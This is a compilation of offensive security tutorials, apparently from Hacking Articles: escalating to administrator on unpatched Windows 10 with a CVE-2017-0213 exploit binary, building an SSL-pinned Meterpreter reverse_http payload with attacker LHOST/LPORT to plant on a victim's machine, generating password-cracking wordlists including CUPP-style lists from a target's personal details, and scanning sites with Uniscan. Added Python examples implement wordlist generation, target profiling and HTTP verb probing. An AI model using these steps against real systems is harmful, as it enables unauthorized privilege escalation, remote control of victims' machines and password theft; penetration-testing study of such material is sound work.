Bypass Admin Access through Guest Account in Windows 10

Open a command prompt and check the current user account with the "whoami" command.

Here the account name is "joe" and the account type shown is 'DefaultAccount', a non-administrator account.

Try changing the administrator account's password with the 'net user' command. You will get the error 'Access is denied'.

Now download "CVE-2017-0213_x64" from here and unzip it on the PC. Open the folder, find the .exe file and double-click it to run it. The exploit targets CVE-2017-0213, a Windows COM elevation-of-privilege bug, so it only works on a Windows 10 install that has not received the May 2017 security update that fixed it.

As soon as it runs, it opens a new command prompt running with administrator privileges.

In that prompt use the 'net user' command to change the administrator account's password. The message 'The command completed successfully' confirms that you have changed the administrator account's password.

Author: Abhimanyu Dev is an aspiring cyber security expert.

Create SSL Certified Meterpreter Payload using MPM

This article shows how an attacker can generate an SSL certificate for an exe or bat payload so that the Meterpreter session from the host back to the handler is validated against that certificate.

An SSL-inspecting firewall intercepts the network traffic and inserts itself, as a trusted third party, into the session between the client and the server. When the client starts an SSL session with the server, the firewall captures the client's SSL request and forwards it to the server. The server's certificate is captured by the firewall; if it is signed by a CA that the firewall trusts, the firewall generates a copy of the server certificate signed by its Forward Trust certificate and presents that copy to the client for authentication. A payload that checks for the exact certificate it was built with will refuse such a substituted certificate.

Meterpreter_Paranoid_Mode.sh lets you secure a staged or stageless Meterpreter connection by having the payload check the certificate of the handler it connects to.

Open a terminal in Kali Linux and type the following to download it:

git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

Once it has downloaded, run Meterpreter_Paranoid_Mode.sh and follow the steps below.

Press enter to continue

A prompt opens asking which option to use for building the certificate; as the screenshot shows, I chose to impersonate a domain.

We start by generating a certificate in PEM format; once the certs have been created we can build an HTTP, HTTPS or EXE payload for it and give it the path of the PEM certificate, which will be used to validate the connection.

Another prompt then asks for the domain name; here the SSL certificate will be generated for www.hackingarticles.in.

To have the connection validated we tell the payload which certificate the handler will use by setting HANDLERSSLCERT to the path of the PEM certificate, then enable checking of that certificate by setting stagerverifysslcert to true.

PEM is a widely used encoding format for security certificates. The syntax and content of the certificate itself are defined by the X.509 v3 standard for digital certificates, specified in IETF RFC 5280. The main file extensions are .pem, .crt and .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between header and footer lines.

In the next prompt choose the payload category to build; from the list I chose stageless (payload.exe).

Once the payload is created we need a handler to receive the connection, and again we use the PEM certificate so the handler can use its SHA1 hash for validation. Just as for the payload, we set HANDLERSSLCERT to the path of the PEM file and stagerverifysslcert to true.

We can see the stager doing the validation when we receive a session back.

Enter LHOST 192.168.0.108 (the attacker's IP).

Similarly, give any port for the reverse connection from the host system and click OK.

Enter LPORT 8888

A list of payloads opens next; choose the desired payload and it will be generated for the attack.

windows/meterpreter_reverse_http

This configures all the settings and launches the Metasploit Framework with a multi/handler listening.

When you move inside the output folder you will find two files: the exe payload and the .pem certificate. Now it is up to you to get the exe file onto the victim's machine and wait for the Meterpreter session to be established.

You can also compare the generated .pem certificate with a genuine CA-signed certificate; in the image below you can read the certificate details for hackingarticles.in, which look just like those of a CA-signed certificate.

As you can see, I have successfully established a Meterpreter session with the victim's system.
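What the stagerverifysslcert check amounts to, as an added example that is not part of this article or of the Meterpreter_Paranoid_Mode script: the payload carries the SHA1 fingerprint of the handler's certificate and refuses any TLS peer whose certificate hashes differently, which is exactly why the inspecting firewall described earlier cannot insert its re-signed copy. The "certificates" below are constructed placeholder bytes wrapped in PEM armour, which is enough because the check only ever hashes the DER encoding.

```python
import base64
import hashlib
import hmac
import re

# Matches one PEM certificate block; the body is base64 with arbitrary line breaks.
_PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.DOTALL)


def pem_to_der(pem: str) -> bytes:
    """Return the DER bytes of the first certificate in a PEM string."""
    match = _PEM_BLOCK.search(pem)
    if match is None:
        raise ValueError("no CERTIFICATE block found in PEM input")
    return base64.b64decode("".join(match.group(1).split()))


def cert_sha1(pem: str) -> str:
    """SHA1 fingerprint (hex) of the certificate's DER encoding: the value a
    verifying payload carries for its handler."""
    return hashlib.sha1(pem_to_der(pem)).hexdigest()


def stager_accepts(presented_der: bytes, pinned_sha1: str) -> bool:
    """The check a verifying stager performs: hash the certificate the TLS
    peer actually presented and compare it with the pinned fingerprint."""
    observed = hashlib.sha1(presented_der).hexdigest()
    return hmac.compare_digest(observed, pinned_sha1)


def make_pem(der: bytes) -> str:
    """Wrap DER bytes in PEM armour with line-wrapped base64."""
    body = base64.encodebytes(der).decode("ascii")
    return f"-----BEGIN CERTIFICATE-----\n{body}-----END CERTIFICATE-----\n"


# Constructed stand-ins (not real X.509 data): the pinning check only hashes
# the DER bytes, so placeholder bytes behave like a real certificate here.
HANDLER_DER = b"constructed DER of the handler's self-signed certificate"
HANDLER_PEM = make_pem(HANDLER_DER)  # what HANDLERSSLCERT would point at
PROXY_DER = b"constructed DER of a copy re-signed by an inspecting firewall"


def demo() -> dict:
    """Pin the handler cert, then test the genuine and the substituted peer."""
    pinned = cert_sha1(HANDLER_PEM)
    return {
        "pinned": pinned,
        "handler_ok": stager_accepts(HANDLER_DER, pinned),
        "proxy_ok": stager_accepts(PROXY_DER, pinned),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Metasploit does this comparison inside the stager; the functions only mirror the logic so you can confirm the fingerprint of a generated .pem (openssl x509 -in cert.pem -noout -fingerprint -sha1 prints the same value) before handing out a payload.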

Try it by yourself!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant and a social media and gadgets enthusiast.

5 Ways to Create Dictionary for Bruteforcing

We live in a digital era, and in the world of technology everything is password protected. There are many ways to crack a password, such as social engineering or trial and error, but the two most successful methods are the dictionary attack and brute force. Each has its perks and disadvantages. Today's article focuses on the dictionary attack, as it is handy and is usually the fastest way to crack a password.

Dictionary attack: a dictionary attack is an attempt to get into a digital system using a precompiled list of likely passwords rather than trying every possible combination. Basically, it is an evolved and advanced form of trial and error, as it brings results fast and is efficient. I am sure there are many ways to build a dictionary for such an attack, but I am going to give you the five best ones.

Crunch

The first is Crunch. The nice thing about crunch is that you can use its output both offline (saved to a file) and online (piped straight into a cracking tool). It generates a wordlist according to your requirements: you give it a minimum and maximum password length and a character set to use while creating the dictionary, and crunch generates every possible combination that meets those requirements.

Now let’s see how to use it. Observe its syntax first:

crunch <min> <max> <character-set> -t <pattern> -o <path>

  • crunch → the tool being used
  • <min> → the minimum length, in characters, of the words you want
  • <max> → the maximum length, in characters
  • <character-set> → the characters to use while creating the dictionary
  • -t <pattern> → optional; a pattern that fixes some characters and marks the positions to fill from the character set with '@'
  • -o <path> → the path where the dictionary file should be saved

For instance, open the Kali terminal and type:

crunch 3 4 ignite -o /root/Desktop/dict.txt

The above command creates a dictionary of every combination of the characters in the word ignite with a length of 3 to 4 characters. The file is saved in text form on the Desktop, as shown in the image below:

Let's now read the dict.txt file; for that type:

cat dict.txt

All the words will be displayed in the following manner:
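To show what crunch is doing for the command above, here is an added example (not part of the article or of crunch itself) that builds the same kind of wordlist in Python with itertools.product, including a simple version of the -t pattern in which '@' marks the positions to fill. It deviates from crunch in one way: repeated symbols in the character set are collapsed, so 'ignite' yields the 5 symbols i g n t e and the output has no duplicate lines. expected_count() is worth calling before writing anything, because the file grows as n to the power of the length.

```python
from itertools import product
from typing import Iterator, List, Optional


def dedupe_charset(charset: str) -> List[str]:
    """Keep each symbol once, in first-seen order ('ignite' -> i g n t e)."""
    seen: List[str] = []
    for ch in charset:
        if ch not in seen:
            seen.append(ch)
    return seen


def crunch_like(min_len: int, max_len: int, charset: str,
                pattern: Optional[str] = None) -> Iterator[str]:
    """Yield every word of length min_len..max_len over the charset.

    With a pattern (crunch's -t), literal characters are kept and each '@'
    is filled from the charset; the pattern length then fixes the word length
    and min_len/max_len are ignored, as with crunch.
    """
    if min_len < 1 or max_len < min_len:
        raise ValueError("need 1 <= min_len <= max_len")
    symbols = dedupe_charset(charset)
    if pattern is not None:
        slots = [i for i, ch in enumerate(pattern) if ch == "@"]
        for fill in product(symbols, repeat=len(slots)):
            word = list(pattern)
            for pos, ch in zip(slots, fill):
                word[pos] = ch
            yield "".join(word)
        return
    for length in range(min_len, max_len + 1):
        for combo in product(symbols, repeat=length):
            yield "".join(combo)


def expected_count(min_len: int, max_len: int, charset: str) -> int:
    """Size of the wordlist before generating it: the sum of n**L over the
    requested lengths. 8 symbols at length 8 is already 16.7 million lines."""
    n = len(dedupe_charset(charset))
    return sum(n ** length for length in range(min_len, max_len + 1))


def write_wordlist(path: str, words: Iterator[str]) -> int:
    """Stream words to a file one per line; return how many were written."""
    count = 0
    with open(path, "w", encoding="utf-8") as fh:
        for word in words:
            fh.write(word + "\n")
            count += 1
    return count


if __name__ == "__main__":
    # Same request as the crunch command above, minus the duplicate 'i'.
    print(expected_count(3, 4, "ignite"))
    print(write_wordlist("dict.txt", crunch_like(3, 4, "ignite")))
    # Pattern mode: keep "ign" and fill the last two positions.
    print(list(crunch_like(1, 1, "ignite", pattern="ign@@"))[:5])
```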

Cewl

The next way is CeWL. CeWL is a custom wordlist generator written in Ruby. When targeting people in the corporate or business world, this is the tool for you. As you all know, it is human nature to use words that are significant to you and occur in your day-to-day life. CeWL works on the URL you give it: it crawls the site to a depth of 2 links (by default; you can raise or lower the depth) and collects every word that could plausibly be a password. From these words it generates a wordlist for you to use as the dictionary in a dictionary attack. Let's observe its syntax:

cewl <url> -d <depth> -w <path>

  • cewl → the tool being used
  • <url> → the URL you want to use as the foundation of your dictionary
  • -d <depth> → how many links deep to crawl while creating the dictionary
  • -w <path> → the path where the wordlist should be written

For example, in the Kali terminal type:

cewl www.ignitetechnologies.in -d 2 -w /root/Desktop/dict.txt

The above command creates a dictionary file using the words found at the URL.

Let's look at the dictionary file it just created; for that type:

cat dict.txt

All the words will be displayed in the following manner:
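An offline illustration of the crawl-and-extract idea behind CeWL, added here and not taken from the article or from CeWL itself. A constructed three-page site stands in for the live URL so the example runs without network access; the parser drops script and style contents, follows links breadth-first to the requested depth, and keeps words of at least three letters, which matches CeWL's default depth and minimum word length.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from typing import Dict, List


class TextAndLinks(HTMLParser):
    """Collect visible words and href targets; skip script/style contents."""

    def __init__(self) -> None:
        super().__init__()
        self.words: List[str] = []
        self.links: List[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.words.extend(re.findall(r"[A-Za-z][A-Za-z'-]*", data))


def crawl(pages: Dict[str, str], start: str, depth: int = 2,
          min_word_length: int = 3) -> Counter:
    """Follow links breadth-first from `start` for `depth` hops and count
    words of at least min_word_length. `pages` stands in for the live site:
    a map of URL -> HTML body, so nothing is fetched over the network."""
    counts: Counter = Counter()
    seen = {start}
    frontier = [start]
    for _ in range(depth + 1):
        next_frontier = []
        for url in frontier:
            html = pages.get(url)
            if html is None:
                continue
            parser = TextAndLinks()
            parser.feed(html)
            counts.update(w for w in parser.words if len(w) >= min_word_length)
            for link in parser.links:
                if link not in seen:
                    seen.add(link)
                    next_frontier.append(link)
        frontier = next_frontier
    return counts


def wordlist(counts: Counter) -> List[str]:
    """Most frequent words first; the order you want in a dictionary."""
    return [word for word, _ in counts.most_common()]


# Constructed three-page "site": the last page is only reachable at depth 2.
SITE = {
    "/": "<html><body><h1>Ignite Technologies</h1><p>Welcome to Ignite.</p>"
         "<script>var token = 'notaword';</script>"
         "<a href='/team'>Team</a></body></html>",
    "/team": "<p>Our founder Raj loves Ignite and his dog Bruno.</p>"
             "<a href='/deep'>More</a>",
    "/deep": "<p>Orphan page reachable only at depth 2: Phoenix.</p>",
}


if __name__ == "__main__":
    for word in wordlist(crawl(SITE, "/", depth=2)):
        print(word)
```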

Cupp

Our next way is a third-party tool, CUPP. The previous tools come pre-installed in Kali, but you will have to install this one yourself. To install it, type:

git clone https://github.com/Mebus/cupp.git

CUPP is written in Python and is a very personalized tool when it comes to password cracking. Studies show that when setting a password, humans follow similar patterns: they tend to personalize the password by adding their date of birth, anniversary date, pet's name, and so on. CUPP focuses on this weakness to help crack passwords effectively. Before creating a wordlist it asks you for the required information about your target, and it builds the wordlist from that information. Now let's see how it works step by step. Start cupp in interactive mode by typing:

./cupp.py -i

Once started, it asks for information about your target, as shown in the image:

Give the required information and your wordlist will be generated as follows:

Pydictor

The next tool is Pydictor. This is a special tool because it can write the wordlist both as plain words and base64-encoded. So if the password you are matching against has been stored base64-encoded, this tool can produce candidates in that form directly. Pydictor is written in Python. There are two ways to use it here: one creates a normal wordlist, the other creates the wordlist in base64 form. We will try both. But first things first: this is a third-party tool, so we have to install it; for that type:

git clone https://github.com/LandGrey/pydictor.git

Once the tool is installed and ready to use, tell it what you want the wordlist generated from. Understand the syntax first:

./pydictor.py --len <min> <max> -base d -o <path>

  • ./pydictor.py → starts the tool
  • --len → the length of the words, in characters
  • <min> → here, give the minimum length
  • <max> → here, give the maximum length
  • -base d → use the digit character set (d stands for digits)
  • -o → the output location
  • <path> → here, give the path where you want the wordlist saved

Let's give the command to generate the wordlist now:

./pydictor.py --len 5 5 -base d -o /root/Desktop/dict.txt

Let's read the file it created to have a look at the words it generated. Pydictor has written its output inside dict.txt, which it created as a directory, so type:

cat dict.txt/BASE_5_5_d_071743.txt

The other method, using the same tool, gives us the passwords in base64 encoding. Let's study the syntax first:

./pydictor.py --len <min> <max> -base d --encode <encoding type> -o <path>

  • ./pydictor.py → starts the tool
  • --len → the length of the words, in characters
  • <min> → here, give the minimum length
  • <max> → here, give the maximum length
  • -base d → use the digit character set
  • --encode → the encoding to apply to each word
  • <encoding type> → here, give the type of encoding you want (b64 for base64)
  • -o → the output location
  • <path> → here, give the path where you want the wordlist saved

Let's give the command to generate the wordlist:

./pydictor.py --len 5 5 -base d --encode b64 -o /root/Desktop/dict.txt

The above command generates the wordlist in base64; let's have a look at it:

cat dict.txt/BASE_5_5_d_070433.txt

Dymerge

The last tool is Dymerge. Dymerge is an interesting and powerful tool written in Python. What dymerge does is take multiple previously made dictionaries and merge them into a single one, so you can use all of them in one go while you sit back and relax. You can merge any number of dictionaries, either default ones or custom-made ones. This is again a third-party tool, so let's install it first:

git clone https://github.com/k4m4/dymerge.git

 

Let's understand its syntax:

python dymerge.py <path> <path> -s -o <path>

  • python dymerge.py → starts the tool
  • <path> → here, give the path of the first dictionary you want to merge
  • <path> → here, give the path of the second dictionary you want to merge
  • -s → sort the merged wordlist
  • -o → the output location
  • <path> → here, give the path where the final wordlist should be saved

Now that we have understood the syntax, let's try the command:

python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt -s -o /root/Desktop/dict.txt

Here I have taken two wordlists (you can take more), one containing numbers and the other alphabetic words, and merged them into one so that multiple dictionaries can be used at the same time.

Let's have a look at the dictionary it has created:

cat dict-1.txt

These are five powerful and efficient ways to build a dictionary for password cracking. Enjoy and explore them, both for hacking and for recovering passwords. Have fun!
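The three remaining tools each do something small and composable to a wordlist, so one added example (not code from the article or from CUPP, pydictor or dymerge) covers all of them: profile_words() builds CUPP-style candidates from a constructed target profile, encode_wordlist() applies the base64 transform that pydictor's --encode b64 produces, and merge_wordlists() does the dedupe-and-sort merge of dymerge. The profile values, the leet table and the year range are assumptions for the demo, not output of any of the three tools.

```python
import base64
import itertools
from typing import Dict, Iterable, List

# Leet substitutions in the spirit of cupp's "l33t mode" (assumed table).
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def profile_words(profile: Dict[str, str], years: Iterable[int] = ()) -> List[str]:
    """CUPP-style candidates from personal details plus case, leet and
    date/year suffix mutations. `birthdate` is DDMMYYYY, as cupp asks for it;
    `years` is an optional set of years to append (an assumption here)."""
    base = [v for k, v in profile.items() if k != "birthdate" and v]
    birth = profile.get("birthdate", "")
    suffixes = [""]
    if birth:
        suffixes += [birth, birth[:4], birth[4:], birth[6:]]  # ddmmyyyy ddmm yyyy yy
    suffixes += [str(y) for y in years]
    suffixes += ["123", "!", "@"]
    words = set()
    for w in base:
        forms = (w.lower(), w.capitalize(), w.upper(), w.lower().translate(LEET))
        for form in forms:
            for suffix in suffixes:
                words.add(form + suffix)
    # Pairs such as name+pet: the combinations people actually choose.
    for a, b in itertools.permutations(base, 2):
        words.add(a.lower() + b.lower())
        words.add(a.capitalize() + b.capitalize())
    return sorted(words)


def encode_wordlist(words: Iterable[str], encoding: str = "b64") -> List[str]:
    """pydictor --encode style transform of an existing list (b64 only here)."""
    if encoding != "b64":
        raise ValueError("only b64 is implemented in this example")
    return [base64.b64encode(w.encode("utf-8")).decode("ascii") for w in words]


def merge_wordlists(*lists: Iterable[str], sort: bool = True) -> List[str]:
    """dymerge-style merge: concatenate, drop blanks and duplicates, sort."""
    seen = set()
    merged: List[str] = []
    for lst in lists:
        for w in lst:
            w = w.rstrip("\r\n")
            if w and w not in seen:
                seen.add(w)
                merged.append(w)
    return sorted(merged) if sort else merged


# Constructed profile for a fictional target.
TARGET = {"name": "raj", "partner": "priya", "pet": "bruno", "birthdate": "15081990"}


if __name__ == "__main__":
    personal = profile_words(TARGET, years=(2017, 2018))
    print(len(personal), "profile candidates, e.g.", personal[:5])
    print(encode_wordlist(personal[:3]))
    print(merge_wordlists(personal, ["123456", "password", "raj1990"])[:5])
```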

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

Scan Website Vulnerability using Uniscan (Beginner Guide)

Through this article we try to elaborate on enumeration using the Kali Linux tool Uniscan.

Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner which also works as an enumeration tool, gathering information such as open ports and protocols on the target and testing it for vulnerabilities.

Let’s start!!!

Open the terminal and type the following command, using the -j option for server fingerprinting:

uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -j

It starts enumeration with PING, sending ICMP packets to the target server to confirm it is reachable.

Next it runs TRACEROUTE, which shows the path a packet takes from source to destination, listing every router it passes through (or at which it is dropped) and how long each 'hop' from router to router takes.

NSLOOKUP is a program for querying Internet domain name servers (DNS). Here it is used for reverse DNS (rDNS), resolving the IP address back into a domain name.

Uniscan then uses NMAP for an aggressive scan against the target server to identify open ports and the services behind them; you can see the result in the screenshot. It also runs NMAP NSE scripts against the target to identify vulnerabilities and details of the running services.

Now type the following command for a dynamic scan against the target server, using the -d option.

uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -d

It will now load the selected plug-ins to fetch more details about the target server.

From the screenshot you can see that it found an email address and then loaded further plug-ins to scan for vulnerabilities such as SQL injection, remote or local file inclusion and XSS.

In the screenshot below you can see that it tested for blind SQL injection and returned a link to the affected page. Similarly it tests for XSS and for remote or local file inclusion.

Now use the -q option to enable directory checks on the target server:

uniscan -u http://192.168.1.1107 -q

From the scan result you can read the directories it found.

Last but not least, use the -g option for web fingerprinting with the following command:

uniscan -u http://192.168.1.1107 -g

Here we see the available HTTP methods GET, HEAD, POST, OPTIONS and TRACE, which may help in verb tampering.

It tries to identify the web service, error messages and the type of error, as shown in the image.

Here the tool inserts a string into the HTML to grab the banner; moreover we have come across the web server's credentials, and from the screenshot you can read the login msfadmin:msfadmin.
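A follow-up check for the HTTP methods Uniscan reported, added here as an example and not part of the article or of Uniscan: it starts a constructed local target on a loopback port that answers the same verbs (GET, HEAD, POST, OPTIONS, TRACE), probes each verb, and flags the two things a tester would act on: TRACE echoing request headers, which enables cross-site tracing, and any write verb (PUT, DELETE) that is accepted. Point probe_verbs() at a real host and port to run it against a system you are authorized to test.

```python
import http.client
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List, Tuple

PROBE_VERBS = ["GET", "HEAD", "POST", "OPTIONS", "TRACE", "PUT", "DELETE"]
Result = Tuple[int, str, bytes]  # (status, Allow header, body)


class LaxTarget(BaseHTTPRequestHandler):
    """Constructed target: answers GET, HEAD, POST, OPTIONS and TRACE like the
    server in the scan above; anything else gets the default 501."""

    def _reply(self, body: bytes, content_type: str = "text/plain") -> None:
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._reply(b"index")

    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()

    def do_POST(self):
        self._reply(b"posted")

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", "GET, HEAD, POST, OPTIONS, TRACE")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_TRACE(self):
        # Echoes the request line and every header back, cookies included.
        echo = self.requestline.encode() + b"\r\n" + str(self.headers).encode()
        self._reply(echo, "message/http")

    def log_message(self, *args):  # keep the demo quiet
        pass


class QuietServer(HTTPServer):
    def server_bind(self):
        # HTTPServer.server_bind does a reverse-DNS lookup of the bind
        # address; skip it so the demo never waits on DNS.
        socketserver.TCPServer.server_bind(self)
        self.server_name = "127.0.0.1"
        self.server_port = self.socket.getsockname()[1]


def probe_verbs(host: str, port: int, path: str = "/",
                verbs: List[str] = PROBE_VERBS) -> Dict[str, Result]:
    """Send each verb with a marker cookie and record what comes back."""
    results: Dict[str, Result] = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        try:
            conn.request(verb, path, headers={"Cookie": "session=constructed"})
            resp = conn.getresponse()
            results[verb] = (resp.status, resp.getheader("Allow") or "", resp.read())
        finally:
            conn.close()
    return results


def findings(results: Dict[str, Result]) -> List[str]:
    """Turn the raw responses into the points a tester cares about."""
    out: List[str] = []
    status, _, body = results.get("TRACE", (0, "", b""))
    if status == 200 and b"Cookie:" in body:
        out.append("TRACE enabled and echoes request headers (cross-site tracing)")
    for verb in ("PUT", "DELETE"):
        if results.get(verb, (0, "", b""))[0] < 400:
            out.append(f"{verb} accepted; check for upload or deletion")
    allow = results.get("OPTIONS", (0, "", b""))[1]
    if allow:
        out.append(f"OPTIONS advertises: {allow}")
    return out


def run_demo() -> Tuple[Dict[str, Result], List[str]]:
    """Start the constructed target on an ephemeral port, probe it, stop it."""
    server = QuietServer(("127.0.0.1", 0), LaxTarget)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        results = probe_verbs("127.0.0.1", server.server_port)
        return results, findings(results)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    res, notes = run_demo()
    for verb, (status, _, _) in res.items():
        print(f"{verb:8s} {status}")
    print("\n".join(notes))
```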

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant and a social media and gadgets enthusiast.
